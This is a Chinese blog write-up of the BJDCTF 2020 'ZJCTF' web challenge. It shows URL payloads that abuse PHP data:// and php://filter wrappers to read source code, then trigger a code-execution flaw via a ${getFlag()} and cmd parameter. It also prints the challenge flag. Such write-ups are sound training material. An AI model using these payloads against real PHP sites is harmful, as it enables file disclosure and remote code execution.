Web 12 [BJDCTF 2020]ZJCTF,不过如此

piter 发布于 26 天前 47 次阅读 110 字


AI 摘要

在信息安全的世界里,挑战与机遇并存。在BJDCTF 2020中,我们将通过一则PHP命令执行漏洞的案例探寻隐藏的真相。如何巧妙构造伪协议以读取特定内容,又如何在文件参数中规避敏感信息,这些技巧将解锁通往flag的门径。本篇文章将带你一同揭示这个过程中的心路历程与技术细节,让你对CTF比赛的魅力欲罢不能!

BJDCTF 2020]ZJCTF,不过如此 | NSSCTF

涉及到php

先看题目

需要读取text的内容是否为I have a dream,且file参数里面不能含有flag

构造使用php伪协议进行读取





/?text=data://plain/text,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php

得到base64

进行解码

发现命令执行漏洞:@eval($_GET[‘cmd’]);





/next.php?\S*=${getFlag()}&&cmd=phpinfo();

Ctrl+G搜索flag

NSSCTF{453a61d6-6601-4a35-bc99-2090d2f0a749}

  • wechat_img
永远不要因为需要大量时间才能完成,就放弃梦想,时间怎么样都会过去的
最后更新于 2025-01-10